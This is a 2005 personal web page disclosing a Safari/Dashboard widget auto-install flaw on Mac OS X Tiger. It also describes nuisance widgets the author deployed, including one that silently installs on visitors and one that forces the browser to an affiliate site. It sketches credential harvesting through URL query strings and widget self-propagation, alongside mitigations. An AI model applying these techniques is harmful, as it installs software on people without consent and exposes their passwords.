zaptastic
blueprint for a widget of mass destruction
by stephan.com
Now we're all sons of bitches
- Kenneth Bainbridge, director of the Trinity tests
Now I am become Death, the destroyer of worlds
- J. Robert Oppenheimer, quoting the Bhagavad Gita
29jun05 @ 1:05 PM: I thought I would note that, yes, Apple has 100% absolutely fixed this problem, several weeks ago, and done so in an entirely elegant and pleasing manner. I am leaving this page up because it continues to get hits, and 404's aren't nice. Users are now warned appropriately of any executable downloads, and Apple has provided a widget for managing widgets. Good job, kudos to the fine folks at One Infinite Loop! The problem could continue to bother users with a brand new Tiger installation, so make sure you use software update!
16may05 @ 5:30 pm: I just received the following from a person who may or may not speak for Apple (it wasn't clear, so I'm omitting the attribution for now)
Mac OS X 10.4.1 addresses the widget auto-installation issue by adding widgets to the items that Safari prompts for before a download is complete. You will now receive a notice:

"<file> is an application. Are you sure you want to download the application <file>?"

...including when Safari is in its default state, i.e., "Open 'safe' files after downloading" is enabled. This issue is now completely mitigated, as no item can be downloaded or installed without the user's express knowledge and permission. Therefore, this issue is now closed.

It's a shame. I honestly did like silent autoinstall, and I'll be sad to see it go. I'm installing the update now.
16may05: Now that the buzz has died down, and a consensus has been reached about how to prevent this, I'll add it in: uncheck "open 'safe' files after downloading" in Safari preferences.
Also, please check out my new widget, locket, pictured.

11may05 @ 4 PM: NEW! In response to controversy over my right to charge for widgets, I have begun to release public domain, generic versions of my widgets. I welcome your comments.

added 09may05 @ 4:20 PM: why I wrote this page

When I wrote this I had a funny feeling I might get Slashdotted.

Welcome to zaptastic.

If you are using Safari on Tiger, thanks to the magic of widget autoinstall, combined with the <meta> tag, a slightly evil widget has been installed in your dashboard. It could be a lot worse. There's a slightly more evil widget linked lower in this page, and I think it would be possible to make a much more destructive widget. I gave you something fairly tame.

You're welcome.

Other browser users will probably find it on their desktop.
In case the autoload doesn't work, here's a link: zaptastic

I picked up Tiger at launch time from my local Apple store, brought it home, and got inspired to start in on a widget the next day. My flores and coras widgets are taking off like crazy. Over the last few days I've figured out quite a lot, including the fact that there are some potentially very annoying things one can do with a widget.

Let's start with autoinstall. I happen to like it, actually, I think it's a great thing. But, as I have demonstrated here, it has the side effect of setting up a situation where a user can be given an application without their knowledge.

That's not such a big deal; by default, widgets can't do much damage, and they can't run unless you drop them into your dashboard. The funny thing is that once that widget is there, according to Apple, you CANNOT remove it. Type "remove widget" into Apple Help, and you find out:

You cannot remove widgets from the Widget Bar or change their order.
Most of those reading this are probably aware of the workaround - just remove the offending widget from ~/Library/Widgets/. The Dashboard bar is not very good about updating when a widget is removed, but eventually it figures things out.

The average user, who can't find their Library folder with two mice and a spotlight, is stuck. It would take all of thirty seconds for me to pick out a nice porn image, make it the icon of a widget, drop it in your dashboard, and you're stuck with it. It doesn't even need any Javascript. Oh, hell, why not? (warning: oh me oh my, this is SO VERY NSFW) Click on this: goatse.cx

Aren't you glad I didn't autoload THAT one?

Annoying, but not actually deadly. Unless, of course, some porn site installs 'chickswithdicks.wdgt' and your heavily armed and unstable spouse sees it. Actually, now that I look at that on my Dashboard, I'm kinda proud of it. Mr. Goatse, wherever you are, I tip my hat. And I hope you can sit down now.

Next, let's talk about zaptastic. I went to the trouble of making it ostensibly useful: it is a countdown timer for the launch of alleged PayPal competitor GreenZap. GreenZap is probably a Ponzi scheme, but do remember that PayPal gave away money when they were new, and it really would be a good idea on general principle if they had competition. Decide for yourself if this is of any utility. That really wouldn't be necessary, though, because the real point of the widget is that when it initializes or you click on it, it takes you to the GreenZap site, with my affiliate code, to try to get you to sign up. GreenZap is a pretty benign place to send you; I'm sure you can think of some less friendly destinations. Otherwise, it's rather well behaved, at least until June 1, after which it will take you there on every refresh.

This is annoying.

With one more line of code, the more evil version that I promised earlier takes you to GreenZap every time the widget is shown. This means that once you install zaptastic_evil, every time you launch Dashboard, your web browser goes to the GreenZap site. Which has the side effect of immediately dropping you out of Dashboard, preventing you from closing the offending widget.

You cannot get rid of zaptastic_evil without deleting it from ~/Library/Widgets/ and rebooting your computer. You cannot use your Dashboard until you delete it from ~/Library/Widgets/ and reboot your computer. Write that down if you're not clear on the concept, on a piece of paper, not a Dashboard sticky, because you won't be able to read it once you've installed this. Because Apple didn't actually give you a way to relaunch Dashboard without a reboot, though I suppose you could just kill the process. Certainly there is no user documentation for that.

This is very annoying.

I am SO not kidding! Do not install zaptastic_evil unless you actually know how to delete it and reboot your computer. zaptastic_evil shouldn't do any real damage, it's not that smart, but I take no responsibility if it does.

This said, here it is: zaptastic_evil.

Readers of this article have added the following, regarding how to kill a widget without rebooting. I did mention above "I suppose you could just kill the process," so I'm not totally clueless.
Daniel Naito <lurhmann@vfemail.net>
When the GreenZap Widget is downloaded, there are two very easy ways to delete it without rebooting:
1. In terminal, type "kill zaptastic_evil\ DashboardClient"
2. Use Activity Monitor to force the offending widget to quit.
Doug Meenan <dkmeenan@gmail.com>
Im not much of a restart person I only restart when I have to. So if you want to stop zaptastic_evil from pissing you off you can just remove it and then open up the terminal and just kill the app.
Aaron Harnly <double a ron at cs dot columbia dot edu>
Just thought you might be interested to see -- i made a page full of widgets that auto-install. They look just like the first page of Apple widgets, except their names begin with two spaces, so they `displace' the Apple widgets from the first page of the Widget Dock.

The Calculator *should* require permission before running; all the others do not. The iTunes widget is a DoS for the user account -- try it only if you're ready to lose open documents.

http://aaron.harnly.net/files/widgets/


NGA <nga@mac.com>
... it's easy to get rid of it: just go to activity monitor and kill that widget after you deleted it from the widget folder... voila gone without restart or logging off.
Robbie Duncan <robbieduncan@mac.com>
It is actually really easy to get rid of zaptastic_evil without rebooting.

Step 1: Remove zaptastic_evil.wdgt. I uses sudo rm -rf zaptastic_evil.wdgt

Step 2: Kill any running instance. I used Activity Monitor which shows each widget as an individual processes. So I killed it.

This could be taken further, of course, using all the nasty tricks developed by the pr0n industry over the last few years - opening hundreds of different pages in a few seconds, or moving the close box around quickly. I haven't tried this, but it looks like you can trivially make a Dashboard widget continue to execute even when Dashboard isn't open - Apple's boilerplate code tells you to put your widget to sleep when the Dashboard closes, and warns you to make sure you do this, so I assume you could keep opening pages and doing other things. I haven't looked, but I think you can make a widget window move around; I know you can resize it as big as you like.

I promised "a blueprint for a widget of mass destruction," so let's take this a bit further. Dashboard widgets are constrained to run in a very safe Javascript sandbox by default. However, a widget creator can make plugins for a widget that (I think) can do anything an app can do, not to mention being able to run any command line process:

Using certain resources within your widget may pose a security risk for users. In these circumstances, the widget security model provides a method for Dashboard to be aware that your widget may perform insecure tasks. If your widget is working with resources that pose a security threat to the user, the user must approve before access is granted.
Dashboard Programming Guide , p 57

Dashboard provides you with a method for using command-line utilities and scripts within your widget. With this capability you can use any standard utilities included with the system or any utilities or scripts you include within your widget.
ibid., p 61

"So what?" you may say, "The user gets warned.". Two words: social engineering. The Macintosh user base is rapidly being conditioned that widgets are harmless little toys, and Apple's warning is fairly innocuous:

goatse.cx is being run for the first time.
Are you sure you want to run this widget?

That doesn't look particularly threatening. I haven't tried any actually destructive things; I would assume that getting root is a lot easier when you're starting from inside the host box. I wonder how many of the gmail passwords entered by users in flores and coras are the same as the root password?

It would be obscenely easy for me to harvest passwords in those applications, by the way... but I don't. I could just generate hits on http://stephan.com/watch.html?username:password and then go read my system logs.

127.0.0.1 - - [05/May/2005:02:49:11 -0400] "GET /widgets/flores/index.html?foo:bar HTTP/1.1" 200 5758

Even without root, though, there are some pretty interesting things you could do. A widget, for example, could use time when it is hidden to add <meta> tags to every .html page stored in the users home directory. If the user happens to be running a web server - or even uploading files to one - this could propagate a widget to other machines. I'm not really a security expert, I'm sure others can think of worse things to do.

Apple has significantly lowered the bar for malicious entities to install and execute damaging code in OSX. Honestly, I don't think this is that big of a deal - causing real damage is likely a bit harder than I make it sound.

Ultimately, it all comes down to Gödel's incompleteness theorem and Turing's halting problem: you can't predict what a program will do until you run it. There is ultimately no solution for this, and you have to strike a balance between usability and security. There will always be viruses, both in the real world and in the information world; that's why humans have immune systems, and that's why we get sick anyway. If there was a way around the incompleteness problem, natural selection probably would have found it a few million years ago.

I think Apple has done a pretty good job of it - the only real change I would consider is re-thinking the logic behind autoinstall, and for heaven's sake, PLEASE provide a way to remove widgets, ideally from OUTSIDE the Dashboard. That's just stupid.

Administrators concerned about security may wish to disable installation of new widgets; from my testing at an Apple store, it appears that they do it by denying write privileges to ~/Library/Widgets/

The rest of you... just watch your back.

Readers of this article have added the following, regarding how to prevent widget autoinstall.
Emily Price <emprice@vt.edu>
The easiest way to turn off auto-installing of widgets is the disable the "Automatically open safe files" preference in Safari (which should probably be off for security reasons anyway). If you do that, you just end up with a zip file on your desktop when the widget tries to auto-load and even when you unzip it doesn't automatically move it into the Library. So, that's a much easier fix for the average user than disabling write access to ~/Library/Widgets
Gregory Weston <gweston@mac.com>
Turns out there's a simple way to eliminate the vulnerability you demonstrate, and it might be worth mentioning on the page. In the main page of the Safari prefs window is a setting to automatically open "safe" files. It's on by default but turned off on my machines, and apparently this has protected me from the attack.


If you found this information useful, please consider making a donation to say "thank you." I've set the default donation above to $50: if you actually need this information, it's worth more than that, but send any amount you wish, or go shopping at my affiliates.
Or, better yet, hire me.

download another widget or explore the stephan.com web site.
mail: stephan@stephan.com

stephan.com is a consultant working primarily in mobile and wireless entertainment and media and interactive television, as well as an accomplished multimedia and performance artist, actor, and dancer. he has a real last name, he just doesn't like it.


I received an email from Charles Farrar at AVNOnline.com asking me:

  1. How did I get the idea for Zaptastic?
  2. Why would I consider writing malware for the Tiger Dashboard?
I was really pleased with the answer, so I thought I would share it with the community.

Well, it came about as a side effect of my need to upgrade flores. When I released the 1.0 version, I was planning on using a different well known flower-selling sponsor whose name begins with four digits :) I even embedded their logo into the application, assuming I would get my LinkShare affiliation approved promptly, and passed the clicks to a temporary page on my site, apologizing for the delay. I could have waited, but I wanted to ship.

After a couple of days and several emails, I hadn't heard from them, and I was worried... What if they never approved me? What if they tried to sue me for using their logo without permission? I was very frustrated by the delay, because Mother's day was coming up - I got over 1000 hits on that page without being able to pass the people on to a flower shop. I wonder how much business I lost?

So, I applied for a different merchant, From You Flowers, and got approved within a day. I updated the widget and thought I would put the link to the update on the temporary page, and then have the new version pass people to a new page. While I was doing that, it occurred to me to try out a meta refresh tag, and see if I could force the new version on the user - I really wanted to get that old version off the Internet.

Well. It worked! At least if you didn't already have the widget. I think it failed if you had it already, it wouldn't overwrite. Don't remember.

Which set my mind to wandering, and thinking it was pretty funny that I could plant stuff on the user end that way.

You can see the original updater page at:
http://stephan.com/widgets/flores/buyflowers.html

I'm not sure why it's still getting hits. 14 today, 26 yesterday, 36 the day before. I expect it to be dead in two more days. When I look back further, it seems to be an exponential decay, which is what I would expect.

As for why? Well, partly just to try it. You know, I didn't really publicize the zaptastic page at all, I just made a small link to it on my widgets page. Also, one person writing to me put it very well, as an inoculation. After all, I made the most benign widgets I possibly could. None of the three are really in any way harmful, unless you consider looking a picture of a stretched rectum harmful, and I went to a great deal of trouble to warn people. I'll note that from my statistics, less than 1% of visitors to that page downloaded the 'evil' version. I explained what it did in clear terms. Every link to that page on my site contains a warning.

I'm quite certain someone else would have thought of it soon enough, and perhaps someone thought of it before me and didn't bother to tell anyone. I even used GreenZap as an example because... well, because if I was sure it was for real and I could actually make a lot of money from people signing up, I probably would have just released the non-evil widget. A countdown timer for GreenZap is just as useful as a countdown timer for, say, Star Wars that takes you to the fan site when you click on it. Exactly the same program.

Someone else wrote me, before it got Slashdotted, criticizing me for publishing that information without informing Apple first. I have no idea who to contact at Apple, and I'm sure my email would have gone into the bit bucket. Further, I am dead set against security through obscurity; hiding a hole doesn't do anyone any good. I said in my page I don't think Apple has done much wrong, and it's a shame they'll probably wind up taking away autoinstall due to my article, because I think it's really cool.

So: I have, almost inadvertently, inoculated the Mac community. I'm making the things I make because I want them: I wanted an email widget, so I wrote one. I wanted an iTunes ratings widget, so I wrote one. I needed a way to retroactively patch a widget that was already in the wild.

I don't want anyone giving me Dashboard widgets that I don't like. Period. So, I wrote something to prevent it.

geez, I really should put this stuff on a proper blog. I've got a personal one hidden away on the net, but I should start using my blogger account. Oh, did I just say that out loud? Whoa.


zaptastic and this article are distributed for free under the Creative Commons Attribution-NonCommercial 2.0 license.
Amazon Honor System Click Here to Pay Learn More
dashboard widgets
by stephan.com

ottmar
a fresh bouquet of email


starman
iTunes ratings


coras
another one

120x90 iTunes
Gin and Juice Private Idaho Hey Fuck You I'd Rather Dance With You
Mother's Day Flowers



flag for ecotopia 120x600

Search Now:  
Amazon Logo